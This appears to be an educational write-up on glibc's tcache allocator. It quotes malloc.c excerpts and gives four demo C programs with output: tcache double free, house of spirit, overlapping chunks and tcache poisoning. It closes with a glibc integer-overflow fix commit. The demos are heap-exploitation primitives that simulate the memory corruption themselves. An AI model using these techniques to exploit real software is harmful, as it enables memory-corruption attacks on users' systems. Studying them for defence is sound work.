#if USE_TCACHE/* We want 64 entries. This is an arbitrary limit, which tunables can reduce. */# define TCACHE_MAX_BINS 64# define MAX_TCACHE_SIZE tidx2usize(TCACHE_MAX_BINS-1)/* Only used to pre-fill the tunables. */# define tidx2usize(idx)(((size_t) idx)* MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)/* When "x" is from chunksize(). */# define csize2tidx(x)(((x)- MINSIZE + MALLOC_ALIGNMENT -1)/ MALLOC_ALIGNMENT)/* When "x" is a user-provided size. */# define usize2tidx(x)csize2tidx(request2size(x))/* With rounding and alignment, the bins are... idx 0 bytes 0..24 (64-bit) or 0..12 (32-bit) idx 1 bytes 25..40 or 13..20 idx 2 bytes 41..56 or 21..28 etc. *//* This is another arbitrary limit, which tunables can change. Each tcache bin will hold at most this number of chunks. */# define TCACHE_FILL_COUNT 7#endif
/* We overlay this structure on the user-data portion of a chunk when
the chunk is stored in the per-thread cache. */
typedef struct tcache_entry
{
struct tcache_entry *next;
} tcache_entry;
/* There is one of these for each thread, which contains the
per-thread cache (hence "tcache_perthread_struct"). Keeping
overall size low is mildly important. Note that COUNTS and ENTRIES
are redundant (we could have just counted the linked list each
time), this is for performance reasons. */
typedef struct tcache_perthread_struct
{
char counts[TCACHE_MAX_BINS];
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
static __thread tcache_perthread_struct *tcache = NULL;
static void
tcache_init(void)
{
mstate ar_ptr;
void *victim = 0;
const size_t bytes = sizeof (tcache_perthread_struct);
if (tcache_shutting_down)
return;
arena_get (ar_ptr, bytes);
victim = _int_malloc (ar_ptr, bytes);
if (!victim && ar_ptr != NULL)
{
ar_ptr = arena_get_retry (ar_ptr, bytes);
victim = _int_malloc (ar_ptr, bytes);
}
if (ar_ptr != NULL)
__libc_lock_unlock (ar_ptr->mutex);
/* In a low memory situation, we may not be able to allocate memory
- in which case, we just keep trying later. However, we
typically do this very early, so either there is sufficient
memory, or there isn't enough memory to do non-trivial
allocations anyway. */
if (victim)
{
tcache = (tcache_perthread_struct *) victim;
memset (tcache, 0, sizeof (tcache_perthread_struct));
}
}
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;
/* While bin not empty and tcache not full, copy chunks. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = *fb) != NULL)
{
if (SINGLE_THREAD_P)
*fb = tc_victim->fd;
else
{
REMOVE_FB (fb, pp, tc_victim);
if (__glibc_unlikely (tc_victim == NULL))
break;
}
tcache_put (tc_victim, tc_idx);
}
}
#endif
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;
/* While bin not empty and tcache not full, copy chunks over. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = last (bin)) != bin)
{
if (tc_victim != 0)
{
bck = tc_victim->bk;
set_inuse_bit_at_offset (tc_victim, nb);
if (av != &main_arena)
set_non_main_arena (tc_victim);
bin->bk = bck;
bck->fd = bin;
tcache_put (tc_victim, tc_idx);
}
}
}
#endif
#if USE_TCACHE
/* Fill cache first, return to user only if cache fills.
We may return one of these chunks later. */
if (tcache_nb
&& tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (victim, tc_idx);
return_cached = 1;
continue;
}
else
{
#endif
#if USE_TCACHE
/* int_free also calls request2size, be careful to not pad twice. */
size_t tbytes;
checked_request2size (bytes, tbytes);
size_t tc_idx = csize2tidx (tbytes);
MAYBE_INIT_TCACHE ();
DIAG_PUSH_NEEDS_COMMENT;
if (tc_idx < mp_.tcache_bins
/*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
&& tcache
&& tcache->entries[tc_idx] != NULL)
{
return tcache_get (tc_idx);
}
DIAG_POP_NEEDS_COMMENT;
#endif
#if USE_TCACHE
/* If we've processed as many chunks as we're allowed while
filling the cache, return one of the cached ones. */
++tcache_unsorted_count;
if (return_cached
&& mp_.tcache_unsorted_limit > 0
&& tcache_unsorted_count > mp_.tcache_unsorted_limit)
{
return tcache_get (tc_idx);
}
#endif
.tcache_unsorted_limit = 0 /* No limit. */
#if USE_TCACHE
/* If all the small chunks we found ended up cached, return one now. */
if (return_cached)
{
return tcache_get (tc_idx);
}
#endif
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
assert (tc_idx < TCACHE_MAX_BINS);
assert (tcache->entries[tc_idx] > 0);
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
return (void *) e;
}
#include <stdlib.h>
#include <stdio.h>
int main() {
void *p1 = malloc(0x10);
fprintf(stderr, "1st malloc(0x10): %p\n", p1);
fprintf(stderr, "Freeing the first one\n");
free(p1);
fprintf(stderr, "Freeing the first one again\n");
free(p1);
fprintf(stderr, "2nd malloc(0x10): %p\n", malloc(0x10));
fprintf(stderr, "3rd malloc(0x10): %p\n", malloc(0x10));
}
$ ./tcache_dup
1st malloc(0x10): 0x56088c39f260
Freeing the first one
Freeing the first one again
2nd malloc(0x10): 0x56088c39f260
3rd malloc(0x10): 0x56088c39f260
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main() {
malloc(1); // init heap
fprintf(stderr, "We will overwrite a pointer to point to a fake 'smallbin' region.\n");
unsigned long long *a, *b;
unsigned long long fake_chunk[64] __attribute__ ((aligned (16)));
fprintf(stderr, "The chunk: %p\n", &fake_chunk[0]);
fake_chunk[1] = 0x110; // the size
memset(fake_chunk+2, 0x41, sizeof(fake_chunk)-0x10);
fprintf(stderr, "Overwritting our pointer with the address of the fake region inside the fake chunk, %p.\n", &fake_chunk[0]);
a = &fake_chunk[2];
fprintf(stderr, "Freeing the overwritten pointer.\n");
free(a);
fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunk[0], &fake_chunk[2]);
b = malloc(0x100);
memset(fake_chunk+2, 0x42, sizeof(fake_chunk)-0x10);
fprintf(stderr, "malloc(0x100): %p\n", b);
}
$ ./tcache_house_of_spirit
We will overwrite a pointer to point to a fake 'smallbin' region.
The chunk: 0x7fffffffdb00
Overwritting our pointer with the address of the fake region inside the fake chunk, 0x7fffffffdb00.
Freeing the overwritten pointer.
Now the next malloc will return the region of our fake chunk at 0x7fffffffdb00, which will be 0x7fffffffdb10!
malloc(0x100): 0x7fffffffdb10
gdb-peda$ p b
$1 = (unsigned long long *) 0x7fffffffdae0
gdb-peda$ p a
$2 = (unsigned long long *) 0x7fffffffdae0
gdb-peda$ x/10gx fake_chunk
0x7fffffffdad0: 0x0000000000000000 0x0000000000000110 <-- new chunk
0x7fffffffdae0: 0x4242424242424242 0x4242424242424242
0x7fffffffdaf0: 0x4242424242424242 0x4242424242424242
0x7fffffffdb00: 0x4242424242424242 0x4242424242424242
0x7fffffffdb10: 0x4242424242424242 0x4242424242424242
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
int main() {
intptr_t *p1, *p2, *p3;
p1 = malloc(0x50 - 8);
p2 = malloc(0x20 - 8);
memset(p1, 0x41, 0x50-8);
memset(p2, 0x41, 0x30-8);
fprintf(stderr, "Allocated victim chunk with requested size 0x48: %p\n", p1);
fprintf(stderr, "Allocated sentry element after victim: %p\n", p2);
int evil_chunk_size = 0x110;
int evil_region_size = 0x110 - 8;
fprintf(stderr, "Emulating corruption of the victim's size to 0x110\n");
*(p1-1) = evil_chunk_size;
fprintf(stderr, "Freed victim chunk to put it in a different tcache bin\n");
free(p1);
p3 = malloc(evil_region_size);
memset(p3, 0x42, evil_region_size);
fprintf(stderr, "Requested a chunk of 0x100 bytes\n");
fprintf(stderr, "p3: %p ~ %p\n", p3, (char *)p3+evil_region_size);
fprintf(stderr, "p2: %p ~ %p\n", p2, (char *)p2+0x20-8);
}
$ ./tcache_overlapping_chunks
Allocated victim chunk with requested size 0x48: 0x555555756260
Allocated sentry element after victim: 0x5555557562b0
Emulating corruption of the victim's size to 0x110
Freed victim chunk to put it in a different tcache bin
Requested a chunk of 0x100 bytes
p3: 0x555555756260 ~ 0x555555756368
p2: 0x5555557562b0 ~ 0x5555557562c8
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
int main() {
intptr_t *p1, *p2, *p3;
size_t target[10];
printf("Our target is a stack region at %p\n", (void *)target);
p1 = malloc(0x30);
memset(p1, 0x41, 0x30+8);
fprintf(stderr, "Allocated victim chunk with requested size 0x30 at %p\n", p1);
fprintf(stderr, "Freed victim chunk to put it in a tcache bin\n");
free(p1);
fprintf(stderr, "Emulating corruption of the next ptr\n");
*p1 = (int64_t)target;
fprintf(stderr, "Now we make two requests for the appropriate size so that malloc returns a chunk overlapping our target\n");
p2 = malloc(0x30);
memset(p2, 0x42, 0x30+8);
p3 = malloc(0x30);
memset(p3, 0x42, 0x30+8);
fprintf(stderr, "The first malloc(0x30) returned %p, the second one: %p\n", p2, p3);
}
$ ./tcache_poisoning
Our target is a stack region at 0x7fffffffdcc0
Allocated victim chunk with requested size 0x30 at 0x555555756670
Freed victim chunk to put it in a tcache bin
Emulating corruption of the next ptr
Now we make two requests for the appropriate size so that malloc returns a chunk overlapping our target
The first malloc(0x30) returned 0x555555756670, the second one: 0x7fffffffdcc0
$ git show 34697694e8a93b325b18f25f7dcded55d6baeaf6 malloc/malloc.c | cat
commit 34697694e8a93b325b18f25f7dcded55d6baeaf6
Author: Arjun Shankar <arjun@redhat.com>
Date: Thu Nov 30 13:31:45 2017 +0100
Fix integer overflow in malloc when tcache is enabled [BZ #22375]
When the per-thread cache is enabled, __libc_malloc uses request2size (which
does not perform an overflow check) to calculate the chunk size from the
requested allocation size. This leads to an integer overflow causing malloc
to incorrectly return the last successfully allocated block when called with
a very large size argument (close to SIZE_MAX).
This commit uses checked_request2size instead, removing the overflow.
diff --git a/malloc/malloc.c b/malloc/malloc.c
index 79f0e9eac7..0c9e0748b4 100644
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -3031,7 +3031,8 @@ __libc_malloc (size_t bytes)
return (*hook)(bytes, RETURN_ADDRESS (0));
#if USE_TCACHE
/* int_free also calls request2size, be careful to not pad twice. */
- size_t tbytes = request2size (bytes);
+ size_t tbytes;
+ checked_request2size (bytes, tbytes);
size_t tc_idx = csize2tidx (tbytes);
MAYBE_INIT_TCACHE ();